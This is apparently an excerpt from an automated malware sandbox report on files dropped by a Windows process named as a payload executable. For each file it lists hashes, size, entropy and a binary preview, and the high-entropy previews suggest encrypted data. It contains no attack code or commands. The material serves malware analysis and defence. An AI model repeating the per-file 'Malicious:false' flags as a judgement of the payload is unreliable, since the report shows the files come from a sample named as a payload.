                                                                                                SSDEEP:192:96Hki3cnCN2ciaaVcURThW62yZZQRV2AZdJkTCtb+p9u5o:lisnCgndRTh9BmRV2AZT0Cu9B
                                                                                                MD5:329BCB4F3D44DFB3D93E30E6EA244DB8
                                                                                                SHA1:13AAA6CFE1111ED1DEB9298B69E0D94758BE0528
                                                                                                SHA-256:3ABEE12F0CA7B7745093F62729C02A8118B345DD030BCF62AF4973A44EF48924
                                                                                                SHA-512:DA8656679F2D9B280A045933E20FCDC3262C11041F5484CB66D250003B3B00F73299B77ED942A94DA72B064391CBE12DCC90830ACB00129E95EF28A35DD9001F
                                                                                                Malicious:false
                                                                                                Preview:<?xmlFt.W.5.lc.N.5...q.9._W.#I.Gh.....hy~!......F>X4..u..5...]...........6.l..Z..!.\..S.P.&.9....8'.`W.5...Ur.U...2..d.^9}.j.J..7D.Q.K^.'....i:@.p:.."c......F.....=..,..Ud....k...k7.w.e.....Z.....f...(..h..e.....T7n.?...I... .Q.!.J.^....._@......E..u.r..fv8.:.. L..Fo.......SG.-........sB.9g...|..T..Sv.F..'.U..K" _....#,.#.m+^/.....i.=|....K.J...>Ulw...P^.5^.+.x.....|;.Ab...2.s..a.}.<S...F......WuZ{.Rsf..T(..[..c@..\.....:.P....\.X.....W.]...|...m[.....8..B..HK.B.-....HH.D......r.Kf..J..o%...l.....XhC>...ZZ...Ob.......$..........~.....^6..y7....Z.).;.P...b....D@].%.@[.0..(...)....L.o..b....x1[C.N.7h.y...7...k.[.2;..p.E.N.&..H.P.J.sk...R...F.U$Rp...-Z..Y.....$.`&.<.5.RR......Z..Zf...^.....L.F[.fy.|..o3g..1..(z....$r0.1j..n...Kn..6......!.L..}S.[.,..|...S..R'.q..F'.......|}~J.$..+a.&.|.Z^~.1...5>Jdo.{..P..4<.:ji...|..^o.d".o.".P.f.R....5;.g}j=....#..[.D.!...oL...".,...d..K)...[..z.8$..1|..2.....B_........=9.a..n.k....%.....=u...R.JNL./*.~..kP
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):816
                                                                                                Entropy (8bit):7.711467012083614
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BGaDfFjqSf58C0iyJsC34SdIsHfJqu5VRCL4UH2gx3bD:kypp0ir+IufJqK3g3H2MLD
                                                                                                MD5:DD0993FEABBDA2BD54EA355727B0C829
                                                                                                SHA1:BD3CAC6203C10F54CAB724B9076E702EDB7DF579
                                                                                                SHA-256:4902D90AB53E0E6FEDAEBFDE31E12E671A6EF70F8BBE5E34DFAE6E2902D9A157
                                                                                                SHA-512:0B3F8235F33F2DFC9CA83B753DA797B84EEBF7FA8A35D5E9E8AC7B02462F7ED8231D90CD278FC7E4B637A39AF5A19F0C0D88C3DC426D7D634A5FD9AE921C55CB
                                                                                                Malicious:false
                                                                                                Preview:<?xml6.h.~....&.\8..#...(V.#......C.t.m=....E.O06..<~mx.m$.......%..r_.}8.....Q..XC...{.v..O.R..IL........:,...$..PK........fu|.e..A.v....<4.....w!...../.:.u..J*}.F.?....../.Mjz.N..L...zq...RcG`o.;....AV .7O.C.../*p......t..j%...J.K.\]#..u"O.I%..#.V,_../.1...F6.....<].u|...mjc........P.D......./....Ac)#.$..!..l.... ....R.$B~r...W.C..k....z.7...:.&L..eC...s.+.....~....u..O~1...7D6.....:.|0,..y..o.9....&....97N...k.=..........T...>5.t."../gKT.>...Q...;..J.$...nd....b.n.....?A......;....I.x5.m.B..E.Ah.......f.mV*r+.9..Vt./4...Z#.r+.o....=..i......O.{....k...@...6.x..s.a....:?._...$Vs ..n....8fM..M#:.....T.:..(.9}.......4v.......]?.a.n...".;.m..m....f...Y.H5..f+....1..A!.1..a.L....../p.dsv.=...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2272
                                                                                                Entropy (8bit):7.906714142718695
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:e1mg7fUNYNiIxy2yr4uIyp882KQ24soT+LD:Xg7UNYkXbIY4soi
                                                                                                MD5:9B693C3D166134E421D3023EF15BA149
                                                                                                SHA1:B95D2D71C184555357DFE4193DC3C5B2D1215BF0
                                                                                                SHA-256:E3FC6FBF8E91E84E6E7F4A04DBDCE0D70403F6EC0F81C8B2BA32A2EC8BB200FA
                                                                                                SHA-512:2BDC59B8F2D2D1BF028E503CC93DC58597611852F6C7E949DF477D7F7C65DC1D832D4111C24B5EDEC061743661F249D391D9391DF108F4D2E5246A2499593BC1
                                                                                                Malicious:false
                                                                                                Preview:<?xml:'....~.x.....yy......0..k..h.....d..t..L.$..2...laX};....c<.].1bJ>.....s....M}@..Q.+.?v?........K.G.w2..pR.w....).E.....Hw~.i>.e...^4. ..K.....CI.......ke"..9.K....[...N..e#.;_.3.[........S...$.D.4.e.....s...X........r...(}.'..n.*..IN.(.._Y.h.2...:..p"lJ..~b........BM..C...sK....s....!!..\.ybc..U.^(8.;...h.y....)..3..Z+.y.dk.{...$!Wt?!{..Z9..w.N.w4.U...u..V.g{J..Q.@5e.nO.Li..hzM.j..gv..$(;.."'..../..S.._[.-i+*..PO..}..Lg..[]d........7-...+.....Z...b..\...m......*......T.;=o.....R..G..c. ..Y..5...2..............j.Q....&C.".~K.&b..o.........$...:..]'F...@".31d.Y.......S-.._.c..3]....)..?...e=...ab.)*...pb!Y.9z...... .<Mn?.(.%....Y..+..[........;..&.5C..S6...i..Y.X..Pq....uk.'!_...@.......2.PNT...N..0..;.....R....K.8..'J......\..G~hX!G......~..b@p........q...>.!...=..Z.....k.D...-..[..6.;Silk..<!m.'f....hj.~...;jT.+.W4..,..v.:....].R....<.J...n.pH.D...y.c.....6...t. ..<..K..J..%.In.7.C..i..7../.]J2A.....~`......FD8_......p....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1311
                                                                                                Entropy (8bit):7.838583605835962
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:HAm+jsM7GsEv+cDg8juFuhN0QCybwWjOIpzKFBvrok/1x3bD:HD+wgEPDQuxCiwVyzKTr7LD
                                                                                                MD5:DB5DB7834178F9A907871F88707B4BB8
                                                                                                SHA1:3E005EF2FB40B199135547DA5A895FA9F3C3A609
                                                                                                SHA-256:2E7FC15A52BF11527029F790EC3963BDF2CBEF75C054E8E024F054E9B5949945
                                                                                                SHA-512:9434BA5B1BF7F6033F64C515745C00AD68DADC2C76388A9E4A3EC797BCEABC72127EDAD6981B782D04C54698FB5B50E5F3A5430D6EDEE44648245A23B8043820
                                                                                                Malicious:false
                                                                                                Preview:<?xml..o..U..C..B..Y..~.M'....j...o......x.d...l^;..vp.d#.+M.&........k.t.>-.`9..hI.6M.R..o...Q...('.rt).'[......}.y.Xk..K..D*,..^O....[.(.[&.M.,...=..{...A<I...9..^$*0.....u..+?3.{.O...d..e.P.e..../pl...~...........Mf.b.N....\.f.}..j..R<5.a... @A.........}.e.?B.....c...wz;<P.$.=.. .8r..U.RKL.ga0..#oq.+....9v...m...`FO.."..E.......!..0.U-.....}J..lA..<V.eHAQ.v.F...Q.^Uh...M.I..<.......m".S<y.....D....g.B..Bf..6....o.....Vn....Dp.t. ..g.(.v....]*..v...0......A[q.L{k..l..f.~|Ge..{8n...o.5..]N.[0...s.].=..).E...*..b.>.[.../.... Z..8.....+...g......cF..KD..]X&..G.......bv..#'..>.B.Z..x.....J9..........R..N.......=6.0s.#cj4..).Nwe.6A.0?.....'".c.M...vc...d:.S.W....q.?.C..C.O.n.l @.....(4Do..Ap...|<Y/..............!.....x..o..........e.~...PU......P~....7.......y=r.2".k.K..v..8?..s.....Z...N.?...&{... \o-7..rjG....M....<..6..j.h59....g.iq_.....eX.....rp.......i....$d.__..6V..~.Doa........e..s:.4wd7J.6...`L.e.^./L$FN.'.w..f+cf.}{.;.X..w.*.U..\P|,^....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3172
                                                                                                Entropy (8bit):7.940355299380892
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Z42y70MmmWC1s6WW/Kl7wrkry4ToO6ugZHFrXeSWsrDIbtTJ1xtsLHlKA7fDLD:ZnMl1WW/Kny4U0gveSWY0pXxtKlKAr
                                                                                                MD5:56E01D08CA1C5B6EF82C6E26916C906A
                                                                                                SHA1:EEAC7999B471AAC6A989F68D4CFDE589494F58D5
                                                                                                SHA-256:73B9A0C5E8E247B293EEED420D1F7B4B82F85D2275B840D5E5BFB8F533EEFF22
                                                                                                SHA-512:9CE259FC21A18D9D30FC10D428A0D787266AE25264431B3AD4D1EB0034810F41B77F69363F38439F96E70F7F9A33A894F1E46B35819799266693C800D29CC6DF
                                                                                                Malicious:false
                                                                                                Preview:<?xml....3.._.S/.zFE9._b.+......6SR.......K.mMiyM`.....Z..B{.2....0..Cv.....p.......4..P......8.s..[...A....kz......"7.#.'c..e.9.lJ.F...i,...mC*......'f..h:@n.o...7.0.e..[..$.s......W[..X._....s.~....."..)vk.8.....P..2./h.2..\A.t.E.4..................ma>M..x.3hJ.....?~..0.l04...!.....SGf...h....B..ks..p.m.y.&*d..[.|X...o...DFH.......... @...7!..Z=......&..=...s.o.........r~.+..9.....R<p..T%{.R...x.X!....q...#n....Z..d?h...,...W.../....z$cM|..4..xC.r).;...=..gT..<M@+..~..*h6.$..~c...#.."f..,.~...aw.3.y.:....k...RM.....JqBs..3R...2.h..Q3..FJ.=..[)..w.P..F..F......u.k...$[.K...3P.oJ...0.>.#..C.J.......y..M.v..._.+8j..ziE...*._..8..{......K.A...M......uD.K.S.R.)....1..3........kC..~8......g.X......R|.J.*n.e...0...n....wE..w.. ..:#..9R.(......P.Hn...i.....C....C.@a....Q..a<f......._...##...+.9..,.y3.6....{9.>B....1..sQ..!......T....#..RSWu../..|..n$N.^.]/.y..`v..%4}!..."...C.4X..C..{...cND1...Z.....^R...3%vm1.iL...cVdo.`w7..F...b...Q:..X..pt$x.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2096
                                                                                                Entropy (8bit):7.915455663146112
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:w7Plcs80SvJDCZubjm0YGr03Pvw0EnWwsavejyzcBkRjRZ10LD:w7d4vJbjF03Pvw0EndsaveC1Q
                                                                                                MD5:4EE9680D8792B6082F5E016083AF7F75
                                                                                                SHA1:950745F53322262F8C3F987F9DC63113B72BBF03
                                                                                                SHA-256:A9C69CEC9F551092A49AC0425DEC1F721CC23E3FA8944EA5559CC2C51620943D
                                                                                                SHA-512:3E0812FDAFA41DD6017DCCCCC1840184B88DE72953F5FD8E42FF8568FE91319977D0187A687222F6480638C670D2EF1F322C8D762751D130C0BDDB49EF6B4923
                                                                                                Malicious:false
                                                                                                Preview:<?xmlnT....-...K...Qs).\...E.8W..Y.....BywIU...J=L.=.b.m.m.P...=9..v.e...Go....5..o..^2.[h.cckv{...W..)5m....i.......d_......jj`r._|.Rf..v._.....G.....W..q..F.yB._[cE.X.*.......:..j..U..M....yQW...I.-.d........o..@..!.g.9..W"..2.......}.=....!..I^1`S.u...I.r...|I.....?#.).E#kP.[..8..C@...n.....|Aw.i0.Z>B...g......>v2.n.m.m.F.....~....b..G:2..J.M.Z}V...h......Y../..b.C...V.b...B..-/...;..U.>.7.^r}L.)......^Y1...V.h.^...V....z.....[..jof@........*...(...w$..P.kqS...m.......@Zg.`bs!^.R]BY.iL..z...N..u.brb-_S.......0....0'm.Q..I..t.uOZ........,.^..M..w..{.d..Py.H^..JO.Ypp_.....3yYM..2...[..J*W.>*.{.4...:......A.=.....0.{..d....`.[m..>3q....f.f....UOK!..s.3j.X........._.|.-s."?j...H..".@.U......4.....w.W.A..f.n\...xZ~.T..+k..+...cQ.x..'&.. ....7..m#.p.z..O../.....U..L..ma_..O..F.0.k.}CC."i.o......W1g....[:d.j.5.....*.......S..,`{<..'.....R.....?&.......D..^..qJ..E....;..v>......,.~|..N..tiAV._...g..B..S.S...=.....R..."^....~R.T.#4g.}Y..q ..[......"....-.S
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7525
                                                                                                Entropy (8bit):7.975996871421113
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:CiZzcw2QEgmMRx8GhX+/uDtk6DwVrOw1NUuiFfsvVZ86O8h8lZ15yl/CnhFfoRpq:/EHgmCpA4SBVyyUfY86PsyChFfoRHE
                                                                                                MD5:B25041E7A973EA77199A79894CE28258
                                                                                                SHA1:8A2A920AD7D0CC8FFF7E8987724965D527DC6E87
                                                                                                SHA-256:5EB891085D1157B5DF3F78820F77020656EF6ED47AF43BAF2F80E7AFC680EE06
                                                                                                SHA-512:03A51F4713D09A47309FE178B634F05ADBA36A7739C723DB2A58F7A49A682C96C5148FB67065ECB3069D4B8932412CCC71781D013F028E978348CFE247EA9337
                                                                                                Malicious:false
                                                                                                Preview:<?xmlg........;......tO:AT..x\!1..%.~...Y.. ..Jg.P.'>.....hq...V....=..M+.;.0.{U.D....Q....4.h....b.T\..W......*...n..Y._.T.....'.......M......p./o.|.=......)7.9A....$o#.xkCf*..).s.3........X.g.v|..S..g]a.../....X.k.......$."4[[U*.....K).........%.s|...UxX.K..k&..4.8..].k..W.....J.<>.6p...B.q.....k.....,!...^.~.%..qq{C%...?.-V.Q.D..>........S.w..5.F.Q..lFv....b..R@F8.%!.G.G.6..1...9..g.uu...-....w./...2.m.\....*S.G\. .7.q..h..1.~m.C2....Q.....O..........."...T.AVU.c.WY.&.~..p.4.(...<.i[8...I.D.n...ms....&.."K..Vu..lW.. o.'.u3ZA....).H......:....[wT.1..t.>h.W......}......f39...<..._...W.Q=j...5(%...<3.m\...<.u.2..7.....:...4.g_..f."......)..aK.....S+t2jSUKU..P<.....Z......X.....j!2..p(..{.]q...R.ts....q...vY.R 8.vI'{...D|...z}N..x.....06.....)..a.F....&.#C.l..........^...6.xp..34.k.y..V*L...].pOK.w..:J`.2~...*>.>fi.i......6.=~{.Pq..c=.Y.&.X.....V[.+..%...a......I...97ru"i4K..}......c .8.1.C...].=..|.S.g.<......A_7...HD.Me./U~.8.R.D,*g
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4197
                                                                                                Entropy (8bit):7.9599956185895415
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:+i6XygcOLJ+etZukerMgFNoLszzfbXmXPogUaCyUz9Y19z9:+iwyHKoZIgEQzfb2XPogUaCyIYv9
                                                                                                MD5:FC35EF8ED83F2B9D894CCF7B060F0A3C
                                                                                                SHA1:6D730FA061A153C744A0580C05557B3AD883CD94
                                                                                                SHA-256:79907A0EFF10AD5A637EF76D15F4EC209070FF124EB79C6EC618E8105046591D
                                                                                                SHA-512:EBE7A72E0B0EAF0EEA5468D4FAF65E16029FBE033FDDAFC38E388B2BC622691930D0554123F8EE3B4C14846D1B1CF817CE17794AEB0269341B8F7DDD3CD71A68
                                                                                                Malicious:false
                                                                                                Preview:<?xml<#..?.+..o...g_....R5...U......M|.k*=D.3.7...y..M.c...[..........n ...........mr|....wU1.iF=.=0?....y...I(..C.......@...<....:bt/..?......<..]L...o..U..,...%d....+#....+H...!zk......?fG%.(..ie/\i....!8..Z.>9E.s...7.O.Z..="..m.;..*.X....=^f.;..E'...W..;.8..n.P.........H..^......\.+.Q+.q+M...sa.......N`j..Y...0.f.BEJ.^...=.?.,5...>..@.#-C.\6..r9..~:....&g...r.z,..Im~C:z....kq.c].../$.&.G...tS..L...O...)......`mY..2..m.....|.7)W........c.T..R.7..%.._-..0...c.c.cA.bT.2w.z.h:.{......vekh......Y.......u...<...)LS..%.1......!9.G......jH....Vpv6..LA..g...0..fr.B./b.......Na..+.c....Eg).K...|..f\z0p.,U}."f.....Jk..V..SX.'../.yf!v...5$w.....k..m....}cU=I..|.CD6...,%....3...}j|.A.yh.{.....(....v.y..,..;.....#t)N`.RX.z&...+..k.....U...cc..\[...d.;|...7.!x.....n...2...V.>..r.....O...a..\........+.R.Dxx........1z...:P..{.K..6.y]\....`.g.S....xih.....v...Vp..}..G.A.....?...|..3v..sL..}.[...q...q..BsP.S.~...3.|w...%J.....5`...D[...H...#.j
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4608
                                                                                                Entropy (8bit):7.953938736969774
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:O2LMJwNndHRnQ7AD3amY9BRAFLr9xgAB3h0QpWJdpvEr1oDFgTFHVrk9vfwbjw:O2oQdxnQIatRCrTgSyOCdpvEr1oDFgTg
                                                                                                MD5:8FDC0FBD70271721EEBAE6EB5F0DD624
                                                                                                SHA1:54C7515EBE4F1845762D522371C8D05D48FBC700
                                                                                                SHA-256:DEEFBBD641F0FB894DAE686B792F14DB5E2613D439AF6B54E03563C1A6D52342
                                                                                                SHA-512:344DB35F60BA72B40DDF7F40CBD0A26ACC2C56DBDFFFDFBC6FDC3E05AA607C947CAF81747778759E0971D3DA0B5E2141418665E23EB169F06337CAA04A7EBB28
                                                                                                Malicious:false
                                                                                                Preview:<?xml.L.'..P>f.....3...'V...s.j.5..jq0...G..Y...0.QK{aG.../.........>.Z..7n..Y...U.y?....w&.|.5......A.YHE.%..#TSI.q.A...M[V(.}.'._.^c\.a.iB.D..&T...f.dO=L....=...N.V....ROR...".p).5..7~^6Ix....e5m').:.....^.A..!..v/.M@N@.KX..'......d...Ct..<>L....C\.../j....;h..SI.\.O.I.=a..Q.[7|....K...R.....k...+......'.&.&.....0..U..lp.O.EQ.@.W..N5.\..q^.Z...J.....bH.Bj..2.:GiH.5,.@X.....r...$I(f.....'..&DY.[..v.e..f....37{I.."....C..Q..%......4..`]!..S...H.....Z..`e..3...O..K..Z..xA....Ia..O.;/.).4$c.Y|#..8..-..[..^.X.Z.{8.........S..)...U.`.~..J..!;.g.Xvw..(}.+.KI..... .0.}..".C.Q.....E8..h.Uz....a...W....8.%.1...l.A/s.._}z.....&.j.Qi....PVB.......f.S2.hj...v.W.r..`=.....$X'...QL`D. N..(z....}.U.<..kW.z@.t...R....A..j]cz.7.'.[...W..U.v.....'...7&./.F$?..g...>=.]../.#.Q.9`..h#...n..>..G.G.V..8,qiNC..x.+{.....V...?. hX...cz.w......*N..]Cs..T...n.B...c.:.Y.)..~S.............ps..;.`[L..&.....2.<@.j.]...}.=.T&I.}D..4.,.M.`y..l._rx....vd.V7.5..T
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2884
                                                                                                Entropy (8bit):7.933051029179912
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:gQjZ/rUidrPJe/h89Uihp9yMyvKwoOgTHFq0aAgRuJZr6TjMRphs1AQdNl0LD:gQV/4iJJoh8GihHxyvKFxT5aAIu3rYGz
                                                                                                MD5:2D2F8EB74B4FBC46CB41F8917E67CA6B
                                                                                                SHA1:67F0995113D93F4BE8BB23AA01FF68BB5F693C7D
                                                                                                SHA-256:7BA47861966A6D65620CDA995050665EC2B3C96AFCA0EF70D74B124931C60FBA
                                                                                                SHA-512:AC6E27B6B42F4E8582ACF79D7B44112ABEA30D867EBFDF1BF4A1C5A51D7AE0A1E39BF30D773945746A0B247E7D9D253B10F568321DC93D8D6F268BAD0424951E
                                                                                                Malicious:false
                                                                                                Preview:<?xml.......%.N..y&...NY.p......hj.V.........^B.R.PP... ..HGYIw..@.......A..`...`)..!...-...-..C..Gr.g....!.....Zj....$....[).w.....L.d.. .....R..U*.......8P.r..*R9..o....].......V.Jd.R..<.X9L.........J..F.m....@.l.(....N.M.....P.........+...!.y..oX.8......\$`.U.<G.g....1.a..P.A..N0RD.e.U..v.....D.nHbf.h+.o.A=:.b....dI..fl......!... ....s.T.}......Eq'......p.3i.S........Jz..3.88..6..4.o|.'.Y...&f....&.......}?......1o(@...).+.E&.y8..2.e...e.z...M..j...........EH...K.=...=...#..5.Say...-0.fL....YT...*.`.K........F..Bd....[......&T.....?:.............g..8..GL.-.hb....5.4U..0;..6M..........H..e...20.... .c....1P.S.e.b.D...:.n.9...A...^..&=.G|.;..E.....:U..P..D.f.-N...i.s.?..~...J...#.7..X.Q%...2yZ...H.U.Z..R........c.!kN....~.kkfTt....Bs...j...!.8....2..2...Y.J.@.....H...R.0..;.Z.X.%.&%".d.q$.....p.mM..6..7.:.U.E..(.Z.E%X.Bl36..._R..p..X3.........Xy(..W..u...E...2y.P....Z.;....u.....aU{n..c....I._..0........m.[....i.V.....$3..w......Y.>6M..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5842
                                                                                                Entropy (8bit):7.962910632121581
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:KQrqrvoDAX+d9JQin7kodCLMz4L2Mo4Rg0Ib1cZaJhe5SMgIRX44je7Z2DX:KuqjPutRko8YzU2eY2aJheMMgIRsZ2D
                                                                                                MD5:05C9213D00E4B5DF53181A7BF819C7D6
                                                                                                SHA1:E623C03839F6F38596950863C35F9930861E5EF0
                                                                                                SHA-256:9D00E40880A7AE90155C38F8D9F7E66C1DA2FDA20C3E1162692A9AFFA4F8273A
                                                                                                SHA-512:0D7256B91EF42BDBEB56101420E8F45BD4F2004E08FF1BBA1BAA23E7974A22CBD808729757CAE1422D3181AC4A201E253182BF4AEE5D8D9E571EFDB7FBDBCA75
                                                                                                Malicious:false
                                                                                                Preview:<?xml..D..,d......~....'tG.6..Vt..E,...{=.J..r.A.v..........2....,h........-...JyKh+p..4...Z;.y.B..M.e..+5..E`..l..{|.lwW.~....u.Z.7.7...F.7.=x.sz...?..t......]...u...Nz.q.N.Y..d..C....8.#mz...{._..A...{KOi..Q...BzN..9x.....!.F.{4.TD..Z...{...AjW..|.nt.....9.7\.........3.=.n.91.%.(/..BW.zj.2...s....8X...A8'.-%....9..**..Gj...>-\.Do.....R.z...%.K..0..A....SEJM.C..C.wP.8.w%.J4.".-,.YE-....0...X...A....U/.G.r..,...;...=...U.....M..J.|..{3....g..a......a.+......TJ.....D....}h...4..{H...\.Pp.......-:.A%........7....b&....4.u....;Ue.K>%..8.5`r#....w....0..t..-k.w...)i.0.n.....c.F...c.......2.....>.:....<.p.B.../..3Hr..r..H...x^{.....V...6....Qp..N.$.....R._(........6....u.M...........I..b......X.*..9....$...e.E.p..C+E.;.U.m.....=.......g......Q=.....A....Q.P!g+n.95..!Rp.J..lu)....P...H?/1....n..u...tg(.o.7..O.s.}..N..oF-.._.K..X..<n...[p..........,..!..PGo..c..>y....w...O...Op....#:X....r..9.....B.V..<...Z.JFhz.j.....V..B....f.........U..$V.X
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2023
                                                                                                Entropy (8bit):7.916620878400982
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:mHsqHxKZCTlsbWGIDQoZm9dOkNAGNrTz8i1sRWuvFLD:mMqHxVLRZmfbAGNrTR1Zq
                                                                                                MD5:A083802655DE54918710D3E2E768E3D8
                                                                                                SHA1:86B4B8926D0C06A974854907FFA4C6725E62AFC8
                                                                                                SHA-256:659D7F5792CF1304E6B350E379FD2E7EB2714B5E291F91786E2A4CDBF998CD3D
                                                                                                SHA-512:E9B9C577A37BD1C0DFA36485AAC94D4D81D9E08A46D42F92F2DCB13B857CA7361A7E6ACFB9A1EB5CFE868B4501E21F13D5738D1F8C95FAB06239239CF8BEB6B2
                                                                                                Malicious:false
                                                                                                Preview:<?xmlv#P..;..p.X.........*..V...t.hV.w=y.lcJ..Uz4.=.2...Z..p.a..4%.........;.^....R\..4.fW....QQ....Q....w......B.`..%V.l ......H.].8d..6;EG.`.....2..h".lQ.1.v.SK.G....e..T(.....|.K....z..o]...nx"..\_.{{...k....UX,c.<2.@..s..9...F|.5..*.........e..d..q.#.".si..i.Z..[...L.......D...RWqL......qU.~O...+j|..Y...mz.B..iD......V.........\.+.....D.V.ShJ.1...Z00...QeZ2....+........[.v*_...f....M..u..G....*....[$M...6r..........*..L=Hq.+(...gRD.i.tu..........B.G...W.E.....W.|.04<..........".X..2.....]..v...@N....B.=...C@..5..wq.[...=.[.(...T.J..&....2......e}0....v.cK.F.T.*...........9..r..W.....a'Yb......BY.._\.k..|..IP8.*..7.|'.t............o..n.?.SzQ....3u>.r...u.l.;..8.V.^-JbJ...`.Sl.3......1.[.. ..}]..Ey]....~Ku..$.<..%...Sa.;...\.B........i.P...w.}..>.......3mJ.... .3...z.~....R...1%...CC.....X^F.n.;..QqA..XR/........~k!j...a......F.N..%].2.%K,...U..7vd...\.JBr.!.^.}....W.(.....~Q..J)...w.)..7.2.4D......{Z..B..z..o..O!..eUb...*.(=WT..w.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1001
                                                                                                Entropy (8bit):7.774547563367191
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jeyqLM+09JTVDTCqzTQWBr/prsGvcve8FnWMx3bD:+WdaqzMoqIOFjLD
                                                                                                MD5:1F97669566872C96F726027181F45C72
                                                                                                SHA1:037F8ACD6E552C6DF11E7044FE2BFDE9B43AD8DB
                                                                                                SHA-256:2EBB67CFDC72E41D1C53DBD536045F0110286A400CA9C6AF158926B60D040573
                                                                                                SHA-512:B84BD8F6A62FF4CD98FCD4E089D908573CC661595507E2736589DA8658FB2DFDBC2544609D1F47FFD7C98F1F81EC35D112F42374D8F94632724B321A6DDE6440
                                                                                                Malicious:false
                                                                                                Preview:<?xmlX.M....mQ...D..Gw!0.."..`..e..).;V..*...{Qg71...0./.%.....>.~...u.....7....!.`..........Z.Z....O..l.I.............0(......RB..+...R...E.,.3..rs.@O.*.....l...w.8N....2....k.F..J..Wc.!(..H..+..s......[6...Pb9..O...|D..W^........Z...$..z..0.a2..b.2m.u.x^....;b..O.;.0J.=..=1.F..N8.R.a._..=.y.<q.h$.Lp4.sP.......'28.......m.uj.....x.v.+`t....>.7....m.....$m....(1...6....7h...0YP..J0..N..OB.3..A.{N$..-....e.b.cD.EK...h[.T0N%\-0.3..<e..n.....M..~mU.{....+...... .u....,.}b.............qu.=..?.9..Q.rr.i.../.oK*H..<.......r@..3..uK.FwJ-..5I...j.j.....[..V.9.%x.....x...H.>x|}~. .'~.9h.F..0..+.._1......!.....\........u...>.8U.iS......=|..(..J....=V....3L..)c.j0a...6.m.o0.md.>...-........@qiX.%..$:...%...F.Q,LqV.o#....P@.T`..}b.n...6J.F..Sf ..+.C.7.F...I54v..P9k.VX`.{..TE..<..FS.F......Z...N..EW..v.s.$...*.d;.cOP.Q.......Y.......Y....y.....S.....b..\,...g..a...,.".....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2743
                                                                                                Entropy (8bit):7.931688426510876
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:R6SvWF/Pa5ItFvN4z5piiyeJP8CqozEEuemZTHYW/siDCHibQiegoDLD:R8Evwje9co+T4W/TWCn/or
                                                                                                MD5:348AF37D006AAB26CC38D40B220C64B5
                                                                                                SHA1:6C69CDC4311A43E672B85D33F0DF737A6AEF2E78
                                                                                                SHA-256:6CBBD53DECBDE6C2FBA83505B2C72720D1445F9DCA0955AD6FEA8AB4E8833C73
                                                                                                SHA-512:409E06A2A3F511A4D17E7A5E19E5970447E506D29B355CE1EC0539EFC34270F568B3678C014BE8C7B65B372EE62FE5F78DBCF40B0D4E2D1C19692DF2820AF6B4
                                                                                                Malicious:false
